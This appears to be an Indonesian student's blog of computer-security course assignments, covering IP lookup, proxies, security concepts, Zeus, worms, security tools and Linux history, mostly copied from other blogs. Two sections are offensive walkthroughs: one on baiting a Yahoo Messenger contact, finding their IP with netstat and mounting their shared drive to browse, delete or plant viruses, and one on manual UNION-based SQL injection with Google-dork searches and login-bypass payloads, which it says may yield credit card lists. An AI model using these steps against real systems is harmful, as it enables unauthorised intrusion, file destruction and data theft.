Just another WordPress.com site

Tugas2

Cara Melihat ip komputer sendiri
1.Dengan mengoneksikan kompter kita dengan internet , lalu membuka http://www.myipaddress.com/show-my-ip-address/

Dan yang akan muncul adalah ip address public kita.

2. dengan menggunakan ip config, untuk melihat ip address lokal kita dalam suatu jaringan LAN (ip address kita pada jaringan LAN)

3. jika kita menggunakan  IP angry maka yang akan muncul adalah ip address private kita

Cara Melihat IP komputer

1.dengan menggunakan IP angry untuk mengetahui ip yang ada di sekitar kita , atau yang tersambung di jaringan (ip komputer lain), atau bisa juga dengan menggunakan netcut

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Cara Mengetahui lokasi komputer kita pada suatu daerah
1. Dengan menggunakan layanan website http://www.geobytes.com/IpLocator.htm?GetLocation

Yang berfungsi untuk mengetahui  negara  kita , contoh  :

IP address : 70.74.218.10
angka ” 70” pada digit pertama menunjukkan negara

Dari situ kita mengetahui  tiap digit pertama adalah merujuk pada suatu area

 

 

 

 

Pengertian Proxy dan Fungsinya

Apa itu proxy?. Pengertian dari proxy yaitu sebuah komputer server yang bertindak sebagai komputer lainnya untuk menerima / melakukan request terhadap kontent dari sebuah jaringan internet atau intranet.  Proxy server bertindak sebagai gateway untuk setiap komputer klien. Web Server yang menerima permintaan dari web proxy akan menerjemahkannya, dan seolah-olah permintaan tersebut langsung dari komputer klien.

 

 

Image : Google Search

Proxy server juga bisa berfungsi untuk mengamankan jaringan pribadi yang terhubung langsung ke  jaringan publik. Proxy server bekerja dengan mendengarkan permintaan-permintaan dari klien internal dan mengirimkannya ke jaringan external, seolah-olah proxy server tersebut menjadi klien. Ketika proxy server menerima respon dari server publik ia akan memberikan repon tersebut ke klien asli, seolah-olah ia publik server.

 

Preferensi :http://www.putrakomputer.com/2012/06/pengertian-proxy-dan-fungsinya.html#.USzELWekzt0

Cara Menggunakan Proxy

Sebenarnya untuk menggunakan proxy gampang saja,teman – teman tinggal membuka alamat penyedia dari proxy ini sendiri yang diantaranya :

Dan masih banyak lagi.Cara menggunakannya adalah :

  • Pada Toolbar Mozilla,silahkan klik menu Options.
  • Kemudian pilih Tab Advanced kemudian pilih Network.
  • Pilih Bagian Setting.
  • Masukan IP pada Kolom IP dan Port pada bagian Port. (Contoh Proxy : 123.123.123.123:8080) Berarti IP yg dimasukan adalah 123.123.123.123 dan portnya adalah 8080
  • Klik OK

Preferensi:http://aldyputra.net/2011/10/pengertian-proxy-dan-cara-menggunakannya/

Cara menyembunyikan IP Address  adalah dengan menggunakan Tools :

      -Auto Hide IP

Platinum Hide IP

       -Real Hide IP

 

 

-Aplikasi Mengintip Data yang Mengalir di Jaringan:

Wireshark

-Aplikasi Remote Komputer :

Radminserver&view ,Teamviewer, Hamachi

-cara menguasai komputer lain lewat yahoo messenger

Kamu ingin lihat File2 orang laen lewat Chat YM ???

 

simple aja deh !!

 

Langkah pertama..modal-nya kita harus tahu IP target yang ingin kita serang terlebih dahulu, dengan cara:

 

1. login YM
2. Ajak target untuk PM an
3. Paksa target terima file kamu..entah kirim apa kek..foto atau data apa aja (buat ngulur waktu)

 

kalau target sudah terpancing…lakukan Langkah kedua:

 

1.Klik start, lanjutkan dengan mengklik RUn
2. Ketik ’cmd’ (tidak pakai tanda petik) akhiri dengan OK
3. Langkah selanjutnya, ketik : ’Netstat -an’ (tidak pakai tanda petik) lanjutkan dengan OK
4. nanti akan muncul banyak keterangan di command prompt kamu…

 

lalu cari tanda 5050 <,sebelum tanda ini, tertulis angka beberapa digit…itulah IP target yg saat ini sedang menerima file pancingan dari kamu tadi.

 

Ip dah dapat…tinggal eksekusi nih: Halaman Command Promt jangan di tutup dulu.

 

Untuk eksekusi..neh dibutuhkan keberuntungan jika anda ingin mengintip file yang disimpan target di komputernya. Hehe…hehe…ketawa terus..awali dengan senyum yah..biar berhasil bro. Yo’i, kalau dah dapat…masih di halaman command promt kamu tadi:

 

1. ketik : ’’net use: h ’’ (Ip target)’shareddocs’’ <

 

Kalau anda berhasil ..maka akan ada keterangan share docs succes..(Kalau sukses…silahkan anda buka drive anda di My Computer..maka akan ada tambahan drive baru..itu adalah drive dari komputer target. Karna anda telah terhubung dengan komputer target, jadi silahkan intip semua file yang tersimpan di komputernya..tentu semua tersedia dikomputer anda skrg…mau hapus..silahkan..mau nambah silahkan..mau nitip Virus..monggo…hehe.dah dikuasai kok..)

 

Catatan: Kalau keterangan error..maka sebenarnya target memasang security yang cukup,jadi silahkan pikirkan cara lain.

 
Keberuntungan adalah awal dari keberhasilan…iya kali? soalnya kalau gk beruntung..gmn mau sukses…hhe

Preferensi:http://achmadmuzaqi-tipskeren.blogspot.com/2011/11/cara-menguasai-komputer-lain-lewat.html

 

Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya: Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

 

Beberapa tool yang di gunakan untuk mendapatkan Password  korban , melalui Sosial Enginering:
Facebook., IRC ,YM,Friendster,Friendbook.

 

Pengertian, Tutorial & Tools SQL Injection

Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.
SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:
1. BSQL Hacker
Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection yang di rancang untuk mengeksplor hampir seluruh jenis data base
2. The Mole

Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS / IDS yang menggunakan filter generik, mole dapat meng eksplor hanya dengan menggunak URL yang rentan dan string valid.
3. Pangolin
Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC, Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan user-friendly GUI dan support hampir untuk selur data base.
4. SQLMap
SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data baseMySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
5. Havij
Tool ini sudah sangat terkenal di gunakan oleh para peretas di seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah 95 persen dan masih banyak lagi kelebihan havij.
6. Enema SQLi
Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis, enema bukanlah tool otomatis, enam tool yang di namis yang memang di rancang untuk profesional.
7. SQL Ninja
Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk targen server SQL, data base fingerprint, dan semu kemampuan untuk mengendalikan database yang rentan injek.
8. SQL Sus
Sql Sus merupakan tool open source antar mukanya berbasis perintah, anda dapat mengambil data base, mendownload file dari data base server dan masih banya lagi.
9. Safe SQL Injector
Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan eksploitasi kelemahan SQL injection dan pengambilalihan database server.
10. SQL Poizon
SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang telah terintegrasi di dalamnya.

MANUAL TUTORIAL SQL INJECTION

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau –
comments: /* atau –
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
[ Langkah 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100′ atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Langkah 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya…
    gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
    [site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
    Misal:[site]/berita.php?id=-100+order+by+1–
    [site]/berita.php?id=-100+order+by+2–
    [site]/berita.php?id=-100+order+by+3–
    [site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
    Misal: [site]/berita.php?id=-100+order+by+9–

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8–
[ Langkah 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama yg keluar angka 5gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Langkah 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama table yang muncul adalah “admin”
[ Langkah 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()–
[ Langkah 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E–
[ Langkah 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah id,username,passwordContoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
[ Langkah 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Source HN Forum
SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.
Contoh Sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username
Penanganan SQL Injection 
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” . 
“where email = ‘$Email’ and password = ‘$Password’”; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”; 
exit(); 

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = “select id,name,email,password,type,block from user”. 
“where email = ‘$Email’”; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, ‘yes’) == 0)

echo “<script>alert(‘Your account has been blocked’); 
document.location.href=’index.php’;</script>\n”; 
exit(); 

$pass = md5($Password); 
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a’=’a
Password : ` or `a’=’a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a’=’a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ; 
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

 

Tugas Perdana

Privacy / Confidentiality
• Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.
• Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator.
• Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut.
• Contoh : data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.
• Bentuk Serangan : usaha penyadapan (dengan program sniffer).
• Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan confidentiality adalah dengan menggunakan teknologi kriptografi.

Integrity
• Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
• Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju.
• Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.

Authentication
• Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud.
• Dukungan :
• Adanya Tools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking(untuk menjaga “intellectual property”, yaitu dengan menandai dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan digital signature.
• Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.

Availability
• Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.
• Contoh hambatan :
• “denial of service attack” (DoS attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash.
• mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan mengakses e-mailnya.

 

Access Control

• Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah
• authentication dan juga privacy
• Metode : menggunakan kombinasi userid/password atau dengan
• menggunakan mekanisme lain.

Non-repudiation
• Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Dukungan bagi electronic commerce.

Preferensi artikel di atas: http://chikachikul.blogspot.com/2010/04/pengertian-keamanan-komputer.html

Zeus Trojan Incar Informasi Perbankan

Selasa, 12 Oktober 2010 21:37 | Ditulis oleh Erry FP. |
cybercrime

Pihak otoritas Amerika Serikat beberapa waktu lalu mendakwa lebih dari 60 orang pengguna program komputer jahat yang dikenal sebagai Zeus Trojan untuk mencuri uang bernilai jutaan dolar.

Zeus Trojan dirancang untuk tujuan memperoleh akses terhadap rekening bank. Virus tersebut dapat melakukan hal ini dengan menginstalasi keystroke logger untuk mengumpulkan informasi login dan password. Kemudian, program ini akan memindai mesin untuk memperoleh password yang disimpan.

Virus ini dapat menyisipkan permintaan mengetik nomor PIN yang benar dalam halaman web sebagai persyaratan tambahan, tanpa disadari oleh pengguna (lihat contoh di bawah).

zeus-trojan

Menurut Norton Cybercrime Report, yang dirilis bulan lalu, 79% responden di seluruh dunia berkeyakinan, penjahat cyber tidak akan bisa dibawa ke pengadilan. Penangkapan tersebut merupakan langkah maju yang positif bagi keamanan internet.

Di sisi lain, penangkapan tersebut juga menunjukkan, pasar bisnis cyber crime sangat menguntungkan dan pentingnya melaporkan kejahatan online kepada otoritas yang tepat.

Untuk melindungi diri Anda dari virus-virus serupa, Norton menganjurkan konsumen untuk:

  • Percaya pada keberanian Anda: Jika bank Anda membuat permintaan ganjil, seperti meminta nomor PIN ATM, jangan ditaati hanya karena datangnya dari perusahaan yang Anda percayai. Bisa jadi ini merupakan pekerjaan penjahat cyber yang terus memantau gerak-gerik Anda hingga akhirnya mereka dapat menguras rekening Anda. Telepon langsung pihak bank untuk memastikan kesahihan permintaan tersebut..
  • Buat password yang bagus: Lindungi password yang Anda gunakan untuk online seperti halnya kunci untuk masuk ke rumah Anda. Password ini harus mencakup angka dan simbol, sehingga tidak mudah dipecahkan, diubah setiap beberapa bulan, dan pastikan tidak disimpan di dalam komputer Anda atau tempat umum.
  • Gunakan solusi keamanan terpercaya: Cara terbaik untuk menghindari pencurian informasi perbankan Anda adalah dengan menghindari infeksi virus seperti Zeus Trojan. Gunakan software keamanan handal untuk memastikan Anda terlindungi dari virus, worm dan ancaman-ancaman lain ketika berselancar di Internet.

Preferensi artikel di atas: www.infokomputer.com

Cacing komputer

Cacing komputer  atau juga di sebut worm  (bahasa Inggris: computer worm atau worm) dalam keamanan komputer, adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer. Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru.

Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.

Beberapa contoh dari worm adalah sebagai berikut:

preferensi: sumber Wikipedia

 

Cyber Sabotage and Exortion

“Kejahatan ini dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan Internet. Modus : kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan, tidak berjalan sebagaimana mestinya, atau berjalan sebagaimana yang dikehendaki oleh pelaku.
Penanggulangan : Harus lebih ditingkatkan untuk security pada jaringan.”

Browser Hijackers

“Browser kita dimasukkan secara paksa ke link tertentu dan memaksa kita masuk pada sebuah situs tertentu walaupun sebenarnya kita sudah benar mengetik alamat domain situs yang kita tuju.
Modus : program browser yang kita pakai secara tidak langsung sudah dibajak dan diarahkan ke situs tertentu.
Penanggulangan : lebih waspada membuka link yang tidak dikenal pada browser.”

Search hijackers

“Adalah kontrol yang dilakukan sebuah search engine pada browser.
Modus : Bila salah menulis alamat, program biasanya menampilkan begitu banyak pop up iklan yang tidak karuan.
Penanggulangan : jangan sembarang membuka pop up iklan yang tidak dikenal.”

Preferensi:Sumber

*DAFTAR APLIKASI KEAMANAN JARINGAN*

Wireshark
adalah aplikasi yang berfungsi untuk mengcapture suatu paket di dalam suatu jaringan,krn kelebihan nya  dalam mengcapture suatu paket terkadang , aplikasi ini di gunakan oleh orang yang tidak bertanggung jawab, dengan tujuan mendapatkan password atau informasi tertentu di dalam suatu jaringan,namun aplikasi ini juga berfungsi untuk hal positif seperti untuk melihat isi dari paket tersebut, dengan kita malakukan capture maka kita akan mendapatkan data yang ada di dalam jaringan dalam bentuk hexadecimal.

TeamViewer
adalah aplikasi yang berfungsi untuk mengendalikan komputer dari jauh, dengan tujuan seorang teknisi jaringan tidak perlu jauh-jauh mendatangi kantor  yang memiliki masalah  jaringan , krn dengan aplikasi ini kita hanya cukup memantau dan memperbaiki  permasalahan jaringan dalam arti software atau configurasi setting TCP/IP (IP Address) suatu komputer di dalam jaringan kantor atau perusahaan.

Hamachi
Di kutip dari Wikipedia indonesia “Hamachi adalah zero-configuration virtual private network (VPN) atau jaringan pribadi virtual tanpa konfigurasi. Hamachi merupakan aplikasi bagi-pakai yang didistribusikan secara bebas yang mampu membangun hubungan secara langsung antar-komputer yang terkoneksi ke dalam jaringan internet tanpa ada konfigurasi yang rumit, dengan kata lain, membentuk hubungan antar-komputer yang saling berjauhan melalui jaringan internet, seakan-akan komputer tersebut terhubung ke dalam jaringan lokal atau LAN.

Saat ini tersedia Hamachi untuk komputer berbasis Windows

System operasi yang dapat menggunakan aplikasi ini adalah Microsoft Windows , Linux, Mac OS X

Ip Angry Scan
adalah aplikasi yang berfungsi untuk mengtahui alamat dari tiap komputer di sekitar kita dengan syarat kita memiliki wireless atau komputer kita terhubung ke jaringan local, di kutip dari http://sourceforge.net/projects/ipscan/
“Scanner IP Angry cepat dan ramah jaringan scanner untuk Windows, Linux, dan Mac. Hal ini sangat extensible, memungkinkan untuk digunakan untuk rentang yang sangat luas dari tujuan, dengan tujuan utama menjadi berguna bagi administrator jaringan.”
Note: IP Angry Scan biasa di anggap oleh antivirus sebagai program berbahaya, walaupun secara kenyataan nya tidak  ^_^
 

 

 

 

Radmin Server dan Radmin Client

Adalah aplikasi yang fungsinya sama seperti Hamachi dan TeamViewer , aplikasi yang berfungsi untuk mengendalikan komputer dari jauh, dengan tujuan seorang teknisi jaringan tidak perlu jauh-jauh mendatangi kantor  yang memiliki masalah  jaringan.
sumber informasi dari artikel di atas : Sumber1
dan  Sumber2
dan Sumber3

linux

Sejarah

Sistem operasi Unix dikembangkan dan diimplementasikan pada tahun 1960-an dan pertama kali dirilis pada 1970. Faktor ketersediaannya dan kompatibilitasnya yang tinggi menyebabkannya dapat digunakan, disalin dan dimodifikasi secara luas oleh institusi-institusi akademis dan pada pebisnis.

[sunting] Proyek GNU

Proyek GNU yang mulai pada 1984 memiliki tujuan untuk membuat sebuah sistem operasi yang kompatibel dengan Unix dan lengkap dan secara total terdiri atas perangkat lunak bebas. Tahun 1985, Richard Stallman mendirikan Yayasan Perangkat Lunak Bebas dan mengembangkan Lisensi Publik Umum GNU (GNU General Public License atau GNU GPL). Kebanyakan program yang dibutuhkan oleh sebuah sistem operasi (seperti pustaka, kompiler, penyunting teks, shell Unix dan sistem jendela) diselesaikan pada awal tahun 1990-an, walaupun elemen-elemen tingkat rendah seperti device driver, jurik dan kernel masih belum selesai pada saat itu. Linus Torvalds pernah berkata bahwa jika kernel GNU sudah tersedia pada saat itu (1991), dia tidak akan memutuskan untuk menulis versinya sendiri.

Desain

Linux merupakan sistem operasi bertipe Unix modular. Linux memiliki banyak disain yang berasal dari disain dasar Unix yang dikembangkan dalam kurun waktu 1970-an hingga 1980-an. Linux menggunakan sebuah kernel monolitik, kernel Linux yang menangani kontrol proses, jaringan, periferal dan pengaksesan sistem berkas. Device driver telah terintegrasi ke dalam kernel.

Banyak fungsi-fungsi tingkat tinggi di Linux ditangani oleh proyek-proyek terpisah yang berintegrasi dengan kernel. Userland GNU merupakan sebuah bagian penting dari sistem Linux yang menyediakan shell dan peralatan-peralatan yang menangani banyak fungsi-fungsi dasar sistem operasi. Di atas kernel, peralatan-peralatan ini membentuk sebuah sistem Linux lengkap dengan sebuah antarmuka pengguna grafis yang dapat digunakan, umumnya berjalan di atas X Window System.

 

 

Distribusi Linux

Lihat juga Distribusi Linux

Terdapat banyak distribusi Linux (lebih dikenali sebagai distro) yang dibuat oleh individu, grup, atau lembaga lain. Masing-masing disertakan dengan program sistem dan program aplikasi tambahan, di samping menyertakan suatu program yang memasang keseluruhan sistem di komputer (installer program).

Inti di setiap distribusi Linux adalah kernel, koleksi program dari proyek GNU (atau proyek lain), cangkang (shell), dan aturcara utilitas seperti pustaka (libraries), kompilator, dan penyunting (editor). Kebanyakan sistem juga menyertakan aturcara dan utilitas yang bukan-GNU. Bagaimanapun, utilitas tersebut dapat dipisahkan dan sistem ala UNIX masih tersedia. Beberapa contoh adalah aturcara dan utiliti dari BSD dan sistem grafik-X (X-Window System). X menyediakan antarmuka grafis (GUI) yang umum untuk Linux.

Contoh-contoh distribusi Linux :

Hak cipta dan merek dagang

